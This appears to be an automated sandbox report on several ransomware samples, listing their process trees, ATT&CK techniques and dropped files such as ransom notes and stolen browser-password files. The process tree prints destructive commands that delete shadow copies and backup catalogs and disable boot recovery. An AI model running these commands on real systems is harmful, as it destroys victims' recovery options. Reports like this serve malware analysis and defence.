                                                PID:4056
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 480
                                                  4⤵
                                                  • Program crash
                                                  PID:1640
                                              • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-078029e18e93dd874d461776954f78f0efc9025328f3a5669529bdf18e944e56.exe
                                                HEUR-Trojan-Ransom.Win32.GandCrypt.pef-078029e18e93dd874d461776954f78f0efc9025328f3a5669529bdf18e944e56.exe
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:4324
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 472
                                                  4⤵
                                                  • Program crash
                                                  PID:2328
                                              • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.Win32.Generic-0ff4058f709d278ed662719b9627618c48e7a656c59f6bfecda9081c7cbd742b.exe
                                                HEUR-Trojan-Ransom.Win32.Generic-0ff4058f709d278ed662719b9627618c48e7a656c59f6bfecda9081c7cbd742b.exe
                                                3⤵
                                                • UAC bypass
                                                • Executes dropped EXE
                                                • Checks whether UAC is enabled
                                                • Enumerates connected drives
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of WriteProcessMemory
                                                • System policy modification
                                                PID:2356
                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                  wmic SHADOWCOPY DELETE /nointeractive
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1836
                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                  wmic SHADOWCOPY DELETE /nointeractive
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5928
                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                  wmic SHADOWCOPY DELETE /nointeractive
                                                  4⤵
                                                    PID:2180
                                                • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.Win32.Generic-94a0b08d785e8f2d109dc5e34e1d9c1e8985a278bf3c11bc7a28a8f0b48b95d7.exe
                                                  HEUR-Trojan-Ransom.Win32.Generic-94a0b08d785e8f2d109dc5e34e1d9c1e8985a278bf3c11bc7a28a8f0b48b95d7.exe
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1088
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 224
                                                    4⤵
                                                    • Program crash
                                                    PID:2352
                                                • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.Win32.Generic-a696ad284e82463e8e7942976bc517feb4247e42d14595c5997c2e6558dc17a9.exe
                                                  HEUR-Trojan-Ransom.Win32.Generic-a696ad284e82463e8e7942976bc517feb4247e42d14595c5997c2e6558dc17a9.exe
                                                  3⤵
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • Drops desktop.ini file(s)
                                                  • Enumerates connected drives
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Drops file in Program Files directory
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5288
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                    4⤵
                                                      PID:5608
                                                      • C:\Windows\system32\vssadmin.exe
                                                        vssadmin delete shadows /all /quiet
                                                        5⤵
                                                        • Interacts with shadow copies
                                                        PID:3140
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic shadowcopy delete
                                                        5⤵
                                                          PID:8608
                                                        • C:\Windows\system32\bcdedit.exe
                                                          bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                          5⤵
                                                          • Modifies boot configuration data using bcdedit
                                                          PID:8572
                                                        • C:\Windows\system32\bcdedit.exe
                                                          bcdedit /set {default} recoveryenabled no
                                                          5⤵
                                                          • Modifies boot configuration data using bcdedit
                                                          PID:6476
                                                        • C:\Windows\system32\wbadmin.exe
                                                          wbadmin delete catalog -quiet
                                                          5⤵
                                                          • Deletes backup catalog
                                                          PID:1292
                                                    • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.Win32.Generic-b67ebcd8164e10251d7b950426950f3b02bd132c31f13da207a8d15f83ac01c9.exe
                                                      HEUR-Trojan-Ransom.Win32.Generic-b67ebcd8164e10251d7b950426950f3b02bd132c31f13da207a8d15f83ac01c9.exe
                                                      3⤵
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • Modifies registry class
                                                      PID:5692
                                                      • C:\Users\Admin\AppData\Local\Temp\Lucky Fixed.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\Lucky Fixed.exe"
                                                        4⤵
                                                          PID:1160
                                                      • C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.Win32.Generic-f6c4ba7e81f05fb9d660adc4a73562ce9d78a5850622bc90132f0afde601f804.exe
                                                        HEUR-Trojan-Ransom.Win32.Generic-f6c4ba7e81f05fb9d660adc4a73562ce9d78a5850622bc90132f0afde601f804.exe
                                                        3⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Drops desktop.ini file(s)
                                                        PID:6044
                                                        • C:\Windows\SYSTEM32\vssadmin.exe
                                                          vssadmin delete shadows /all /quiet
                                                          4⤵
                                                          • Interacts with shadow copies
                                                          PID:5212
                                                        • C:\Windows\system32\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c timeout 1 && del "C:\Users\Admin\Desktop\00438\HEUR-Trojan-Ransom.Win32.Generic-f6c4ba7e81f05fb9d660adc4a73562ce9d78a5850622bc90132f0afde601f804.exe" >> NUL
                                                          4⤵
                                                            PID:3708
                                                            • C:\Windows\system32\timeout.exe
                                                              timeout 1
                                                              5⤵
                                                              • Delays execution with timeout.exe
                                                              PID:7116
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4056 -ip 4056
                                                      1⤵
                                                        PID:1384
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4324 -ip 4324
                                                        1⤵
                                                          PID:1568
                                                        • C:\Windows\system32\wbem\wmic.exe
                                                          wmic SHADOWCOPY DELETE /nointeractive
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2792
                                                        • C:\Windows\system32\wbem\wmic.exe
                                                          wmic SHADOWCOPY DELETE /nointeractive
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          PID:2028
                                                        • C:\Windows\system32\wbem\wmic.exe
                                                          wmic SHADOWCOPY DELETE /nointeractive
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          PID:3988
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1088 -ip 1088
                                                          1⤵
                                                            PID:2012
                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                            1⤵
                                                              PID:5328
                                                            • C:\Windows\system32\vssvc.exe
                                                              C:\Windows\system32\vssvc.exe
                                                              1⤵
                                                                PID:5436
                                                              • C:\Windows\system32\wbengine.exe
                                                                "C:\Windows\system32\wbengine.exe"
                                                                1⤵
                                                                  PID:3180
                                                                • C:\Windows\System32\vdsldr.exe
                                                                  C:\Windows\System32\vdsldr.exe -Embedding
                                                                  1⤵
                                                                    PID:6372
                                                                  • C:\Windows\System32\vds.exe
                                                                    C:\Windows\System32\vds.exe
                                                                    1⤵
                                                                      PID:4860
                                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\Qpinj_readme_.txt
                                                                      1⤵
                                                                      • Opens file in notepad (likely ransom note)
                                                                      PID:7136
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\HEUR-Trojan-Ransom.Win32.Generic-0ff4058f709d278ed662719b9627618c48e7a656c59f6bfecda9081c7cbd742b.exe
                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Windows\HEUR-Trojan-Ransom.Win32.Generic-0ff4058f709d278ed662719b9627618c48e7a656c59f6bfecda9081c7cbd742b.exe
                                                                      1⤵
                                                                        PID:9116
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
                                                                        1⤵
                                                                          PID:4256
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
                                                                          1⤵
                                                                            PID:9284
                                                                          • C:\Windows\System32\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                            1⤵
                                                                              PID:8992
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s FDResPub
                                                                              1⤵
                                                                                PID:10072

                                                                              Network

                                                                              MITRE ATT&CK Enterprise v15

                                                                              Reconnaissance

                                                                              Resource Development

                                                                              Initial Access

                                                                              Execution

                                                                              Command and Scripting Interpreter

                                                                              2
                                                                              T1059

                                                                              PowerShell

                                                                              1
                                                                              T1059.001

                                                                              System Services

                                                                              1
                                                                              T1569

                                                                              Service Execution

                                                                              1
                                                                              T1569.002

                                                                              Windows Management Instrumentation

                                                                              1
                                                                              T1047

                                                                              Persistence

                                                                              Boot or Logon Autostart Execution

                                                                              1
                                                                              T1547

                                                                              Registry Run Keys / Startup Folder

                                                                              1
                                                                              T1547.001

                                                                              Create or Modify System Process

                                                                              2
                                                                              T1543

                                                                              Windows Service

                                                                              2
                                                                              T1543.003

                                                                              Privilege Escalation

                                                                              Abuse Elevation Control Mechanism

                                                                              1
                                                                              T1548

                                                                              Bypass User Account Control

                                                                              1
                                                                              T1548.002

                                                                              Boot or Logon Autostart Execution

                                                                              1
                                                                              T1547

                                                                              Registry Run Keys / Startup Folder

                                                                              1
                                                                              T1547.001

                                                                              Create or Modify System Process

                                                                              2
                                                                              T1543

                                                                              Windows Service

                                                                              2
                                                                              T1543.003

                                                                              Defense Evasion

                                                                              Abuse Elevation Control Mechanism

                                                                              1
                                                                              T1548

                                                                              Bypass User Account Control

                                                                              1
                                                                              T1548.002

                                                                              Direct Volume Access

                                                                              1
                                                                              T1006

                                                                              File and Directory Permissions Modification

                                                                              1
                                                                              T1222

                                                                              Impair Defenses

                                                                              2
                                                                              T1562

                                                                              Disable or Modify System Firewall

                                                                              1
                                                                              T1562.004

                                                                              Disable or Modify Tools

                                                                              1
                                                                              T1562.001

                                                                              Indicator Removal

                                                                              3
                                                                              T1070

                                                                              File Deletion

                                                                              3
                                                                              T1070.004

                                                                              Modify Registry

                                                                              4
                                                                              T1112

                                                                              Credential Access

                                                                              Discovery

                                                                              Network Service Discovery

                                                                              1
                                                                              T1046

                                                                              Network Share Discovery

                                                                              1
                                                                              T1135

                                                                              Peripheral Device Discovery

                                                                              2
                                                                              T1120

                                                                              Query Registry

                                                                              4
                                                                              T1012

                                                                              Remote System Discovery

                                                                              1
                                                                              T1018

                                                                              System Information Discovery

                                                                              6
                                                                              T1082

                                                                              System Location Discovery

                                                                              1
                                                                              T1614

                                                                              System Language Discovery

                                                                              1
                                                                              T1614.001

                                                                              Lateral Movement

                                                                              Collection

                                                                              Command and Control

                                                                              Exfiltration

                                                                              Impact

                                                                              Inhibit System Recovery

                                                                              4
                                                                              T1490

                                                                              Service Stop

                                                                              1
                                                                              T1489

                                                                              Replay Monitor

                                                                              Loading Replay Monitor...

                                                                              Downloads

                                                                              • C:\Msdfap.ini
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                794654c0ed26e4e539e1273ee3cae5ba

                                                                                SHA1

                                                                                cdc10e2e71d8af39681752a095a2aa6205d80608

                                                                                SHA256

                                                                                8136d902e6c82d9ec902268f42daa4400f70fe4865f05302fa381ef3be7e976e

                                                                                SHA512

                                                                                186b0b38f7101970d0866c89160e6b18ff4cc9ff211a92685ddf2562afd5c8a4e82d6c43bdf9812ce93edb334c125c26c21b0781c27eea7eb54aff0cdb3016e8

                                                                                Download Submit

                                                                              • C:\Program Files\Restore-My-Files.txt
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                ed4fb0144bbf652a69c5b36fc6caf127

                                                                                SHA1

                                                                                c7b5f7a3630a239e2bdbdb4f426a0f2a0570f590

                                                                                SHA256

                                                                                16b43ec9d0ee297ee02156781dbbab84f96051d69f24b7cf559f1b4b117a00c3

                                                                                SHA512

                                                                                30a09ca3dfdf3333764359ea83b166ae9062c4e5c147e5ca5318d2829bf5df5ecd63c81181530dd8620e1130680f24473e17f88b0a82d2d2cbf3b27e69110eb5

                                                                                Download Submit

                                                                              • C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\Restore-My-Files.txt
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                5c29fe9791deac196bc86229a10fe9eb

                                                                                SHA1

                                                                                fc9e8993ac7839ec12dc2252252d38b5e9d390ca

                                                                                SHA256

                                                                                5d67fae98c4f19c5489e4f6a4a3d17db8f570ed3de2d06317b7033325dc8e1bc

                                                                                SHA512

                                                                                8a52a23d7cabacdc7c43c8eeee44db3d4842dc5b58828bbf4305c3e1adfe7fda7375d690edeaf325766556e7efdfa70958164e78b0b73675a96979a329780260

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                                                                Filesize

                                                                                56KB

                                                                                MD5

                                                                                752a1f26b18748311b691c7d8fc20633

                                                                                SHA1

                                                                                c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                                                                                SHA256

                                                                                111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                                                                                SHA512

                                                                                a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                                                                Filesize

                                                                                64KB

                                                                                MD5

                                                                                3065b71cd94620cea209027abf11bbbb

                                                                                SHA1

                                                                                c1eebe3a6bb7de300a732652b4eb40bdbb9f5734

                                                                                SHA256

                                                                                41f3cbee88c966b86e56f79dd1e905bedb2023e9a92dff062f973e187db779ca

                                                                                SHA512

                                                                                810be9f6a7a14ab7f68990eefbe3d06088de9c93939dad64410eded66016bb0deb2eb40821f9c8e0aeb2e93890f28c8d5207a76e0b4534f8ae3170cbb80dbe1b

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
                                                                                Filesize

                                                                                12KB

                                                                                MD5

                                                                                7cfb87855519c8fa6a9567cd0e0d2032

                                                                                SHA1

                                                                                2647bedae8d8bdb1961924b9a890f57b8e3625c7

                                                                                SHA256

                                                                                fe556552bbe4b522ec809db64ef4c7d81eb44e099444bb78d781ddd6a943700e

                                                                                SHA512

                                                                                910c15a540341bac7f54907665b6fa4dce19f2becf477c629edc419b82d719e1b6215823879caead4e449d82255ef62323de2b0920f29e764b38507cb7583a86

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
                                                                                Filesize

                                                                                12KB

                                                                                MD5

                                                                                fc964185831d66296b283d567b6b0003

                                                                                SHA1

                                                                                da4a1abd08939801a21960d5d31527cc6b7baa29

                                                                                SHA256

                                                                                51f5f86ff9b4a245ae24a7b764be4ad3e5bfd3322bb3e31142b25fa564438295

                                                                                SHA512

                                                                                e009715dd07744e4dfd9513d4c5f13987c69e6cb341856fcc0fc201a3fda2a36d425c3609c35a3e8598f7cb508a179e6d993bb77aff466fa97a57ddc5ee59ffb

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
                                                                                Filesize

                                                                                64KB

                                                                                MD5

                                                                                d2fb266b97caff2086bf0fa74eddb6b2

                                                                                SHA1

                                                                                2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                                                                                SHA256

                                                                                b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                                                                                SHA512

                                                                                c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
                                                                                Filesize

                                                                                4B

                                                                                MD5

                                                                                f49655f856acb8884cc0ace29216f511

                                                                                SHA1

                                                                                cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                SHA256

                                                                                7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                                SHA512

                                                                                599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
                                                                                Filesize

                                                                                944B

                                                                                MD5

                                                                                6bd369f7c74a28194c991ed1404da30f

                                                                                SHA1

                                                                                0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                                                                                SHA256

                                                                                878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                                                                                SHA512

                                                                                8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Browsers\Passwords\Passwords_Edge.txt
                                                                                Filesize

                                                                                426B

                                                                                MD5

                                                                                42fa959509b3ed7c94c0cf3728b03f6d

                                                                                SHA1

                                                                                661292176640beb0b38dc9e7a462518eb592d27d

                                                                                SHA256

                                                                                870ef3d2370932a8938faa60abd47d75ea0af98bfa11c82ae8efe9e94fd8be00

                                                                                SHA512

                                                                                7def291737d081c93d0cc38ac8d3062fd34d93b68d191eb0d54e9857e0c0afdbcd241471a2e10c28ce8db3b1d1ae0dba2ef6f609cfe8a1e8fe1dd103dba80007

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Browsers\Passwords\Passwords_Edge.txt
                                                                                Filesize

                                                                                852B

                                                                                MD5

                                                                                f6112b3498179e945ef8ca979e810858

                                                                                SHA1

                                                                                78411bf22b09f0243f0c4405970b292e8f391f41

                                                                                SHA256

                                                                                72b2b8ebdc6ebf268b47939e38ff5c6439d458b1149af61b69103de2a0f3feb0

                                                                                SHA512

                                                                                1ab7bd43b6a62c79336d907e2ec6337f61b20bfdd4b184ff4d3838a84097353c8d7bf21a3e9751b1a7e1af0fae704c39aed1c683bbc1b9151351e246e91ac604

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Browsers\Passwords\Passwords_Edge.txt
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                6ca856c7d40e1edc69008e9f4f7a7ba2

                                                                                SHA1

                                                                                62b795c02b6b02e313c15e1c369991f08814a95c

                                                                                SHA256

                                                                                a8cdd831224a169d08a48633ace3675d98a243ccff849a85ebd1e95a76d04242

                                                                                SHA512

                                                                                6423bb1e45a8277b2c3ee1cb21324a8abca3735efcf8e45d1aa27e597230e37f01999a3229eb98ff2d42e68de17bf1f093546f5d7e89f246fecdb4b04e9d1db7

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Browsers\Passwords\Passwords_Edge.txt
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                e21da2b922a86aa441a087588d8ba063

                                                                                SHA1

                                                                                eae0e83300e2fd672a5b75989f9934658aafc42e

                                                                                SHA256

                                                                                80a07a4e8531475b3819d1a9611b8bdb0205702bb6c7f96729cbc4b9ee496758

                                                                                SHA512

                                                                                e3131a211c6e5ec2ccafb0378fabeed48156b5e8df2d6ecb0b7dbfa47a7ca35244114ff788e72b8e6950be9bd3ed1fdcc4863b18af8d3103449e07abdd039343

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Browsers\Passwords\Passwords_Edge.txt
                                                                                Filesize

                                                                                2KB

                                                                                MD5

                                                                                88fe72ee318201e46a1fc7f58fc5a0f7

                                                                                SHA1

                                                                                799df8bb300d508996d900212edad6170a9bd2bf

                                                                                SHA256

                                                                                d62a3f605afb8ed80e349f488425d6fb576b9acbf0c8afac0cc341bbc7096912

                                                                                SHA512

                                                                                1ae6ca9d5e0295124618832910a062ddc85d3565dda03b1886bd0dcc483c861b21de7605713ed27813c15b9ffa4e0757c46d77a15c21a81cf41099e820294a9d

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Browsers\Passwords\Passwords_Edge.txt
                                                                                Filesize

                                                                                2KB

                                                                                MD5

                                                                                656726952302f87aa14938d0db9ee454

                                                                                SHA1

                                                                                a7218b06ef1170e77be390b33877b38519f19e28

                                                                                SHA256

                                                                                51664925b2e581d6a27d81a84273aaa8a1dbb6572956a5455bc73e1868ba6e8b

                                                                                SHA512

                                                                                101e39b11d24bbca94f815458c9c2296b724a9104cea9070c143216a69514b51aecb98d97be8899d4e0c925d7749557d9cfe61e35250dd8004a8154b538fd5c7

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Browsers\Passwords\Passwords_Edge.txt
                                                                                Filesize

                                                                                2KB

                                                                                MD5

                                                                                81b99703a3960d307cd3ab62339c6d2e

                                                                                SHA1

                                                                                78a2f3bc7bb88f881a2511cc2de8221c48f81a23

                                                                                SHA256

                                                                                2ca6e84f6978690a4fbe9f8afb9c8906362e17dfec9da01861ed44ac3df4832d

                                                                                SHA512

                                                                                33182c99d24f276968c8c85686593b71efdfca475e630864f5399895d83aa1d320b0de7866c1cce2231d02b80cce641e71763d28535ed05e90b9b0ad70eb478d

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Browsers\Passwords\Passwords_Edge.txt
                                                                                Filesize

                                                                                3KB

                                                                                MD5

                                                                                e181e9fc3087583b84164406113f6321

                                                                                SHA1

                                                                                7244c18a52b2c74fa39b7104e779f304b9ae4c12

                                                                                SHA256

                                                                                6661f2827c61623c6e7ab76fc8c79eb9dc4289e564b781d1f573fbf6f1a2f880

                                                                                SHA512

                                                                                0686425870c1faec44ab2becaff21a17aaf9ff89bf7d6ad7e41cc2ff0cf3e9f9c17028c614b4982a61e5adccb9cbed99a8edb57f85d962bcaa62858eb55c8249

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Browsers\Passwords\Passwords_Edge.txt
                                                                                Filesize

                                                                                3KB

                                                                                MD5

                                                                                78dd6580ce6665dd6d6c2f0c244463f8

                                                                                SHA1

                                                                                67cac6c403c3f17e1c0722fb0c2eb250fd8241d8

                                                                                SHA256

                                                                                ce4f8a9c0b97185ba35cffcf896ffb5076a0b82a13d250b25c452104583a277f

                                                                                SHA512

                                                                                31e53c2f36069f2491f2fa435e147abfa64467f495e99f5818f000a9c73c99600fba4cab10fc1e9a7ea1b866ab519a26d8444325c0db738952d5e42a929c4b39

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Browsers\Passwords\Passwords_Edge.txt
                                                                                Filesize

                                                                                4KB

                                                                                MD5

                                                                                266b750ff315185a8866f8a186995b76

                                                                                SHA1

                                                                                df45b2f0e9a4647cc74b90e7a13bc613c49fa93a

                                                                                SHA256

                                                                                cc40de1552dab9ec217ede32da2c13a8afcf4ad8e440143a0028099035586dd2

                                                                                SHA512

                                                                                3a7e7e9d664c02b65998cfb489a24d403e20593ce5f84484dec2e56d76a759ba8403e1671f0a6460388c268387978916cc4dfb3a5a2e47d2b0a6ed17a7014645

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Computer.txt
                                                                                Filesize

                                                                                284B

                                                                                MD5

                                                                                e4ea2e88acbbdf201502419aafcb9da8

                                                                                SHA1

                                                                                08e4652472d1d9fbfbe21233d96a05e5845fb32b

                                                                                SHA256

                                                                                755224115c460793e79072e51a534cc9cd4578c2fca66cbd0d39639c3dd24859

                                                                                SHA512

                                                                                d195c448cad9c19e7ffb2d66b2c448d090bcf6c6ab20787c55bec86a60bf66aae41c7a30e64343517e603a427809a75d1630ffa527e915a7afaebd6edba5e908

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Grabber\___RECOVER__FILES__.jcrypt.txt
                                                                                Filesize

                                                                                4KB

                                                                                MD5

                                                                                f59d989b37b7ef404daf068d5e808313

                                                                                SHA1

                                                                                b9a9d7a55169f91cca39351f4f47fb0dab323eef

                                                                                SHA256

                                                                                46ed5560ea0ffdfe647f2db5416eaa1783572b732f0972476ad119a274373e42

                                                                                SHA512

                                                                                046466c754c3c1539167cbcb1e704e3c51f763810d76e779c871ee4a44ebeafa6821d40332a440f99f07186b5f02cc80b768634cd499db5c61facbff08bc054e

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Processes.txt
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                665b62d0d5c21be746e1d00f4c468b38

                                                                                SHA1

                                                                                b3bbd34be0e5724b894d2b0d82da96185efe2336

                                                                                SHA256

                                                                                822fca9a2c24917d123dc5797ed6ea1e54c0515751d3d9f6017485404c43a48c

                                                                                SHA512

                                                                                18a1f3519c2da999bebb69e68d9ce46cf271548ca5c15478c599a7e03a54a3c4b43cda6726d61552b8dca191d9b550799c3f5f2957c537e2daedcfdd581a32cb

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Processes.txt
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                9062d61aaeb6bffdf857d5a296727b44

                                                                                SHA1

                                                                                719514dc85d1a9273969e37796c771e62f924dc5

                                                                                SHA256

                                                                                9075a1bb1fdafdff126dfe7ef3d3aea0882b59e572bf288809fe8aff6a9dc3f4

                                                                                SHA512

                                                                                0e14791d553535f126d6ffe182e6bfe7e217544b10af53c8193f4d8d45a787924fc3f137767bd8ab68ba8e7473871d7a30c6e9dd3639e0f5df76222d9949ec1a

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Processes.txt
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                62ee78862c1884aaa2836525c9f13caa

                                                                                SHA1

                                                                                1ebf074c5c0b3e9e9f2b8d49ba82a1520b1d6172

                                                                                SHA256

                                                                                e9119d8cb9b4557d30dbafe0299b52ea986395fced69ee8257aa5952723f1fa3

                                                                                SHA512

                                                                                3351c81f62e79f677e77a7d23d6cd8e706bb5a013e29cddb622b854a91d1349611b5b32497123dbd408eca3841d2addb3d4d5988d0aa837f1256271442532b23

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Processes.txt
                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                5e960827b30086d66d1f59001b9e08f0

                                                                                SHA1

                                                                                a5058b7892b79b4cfa2c880f5b75aafb47681555

                                                                                SHA256

                                                                                59a3cceeb629f0e09762b4bdeb7b8bdbf7464b43ef3d129f244af0e05f7e4b88

                                                                                SHA512

                                                                                be9b999abf7b66906ac2ebdbf66ec8260361955770353821bddd9ad0ae39174bdd42d3f45018a04f6fe238cdc78fc94a06205b42b5496aa9ff4c0aee81112377

                                                                                Download Submit

                                                                              • C:\Users\Admin\AppData\Local\LZBNXDRJDByZRXuRP5073EBCC71\715073EBCCLZBNXDRJDByZRXuRP\Screenshot.Jpeg
                                                                                Filesize

                                                                                137KB

                                                                                MD5

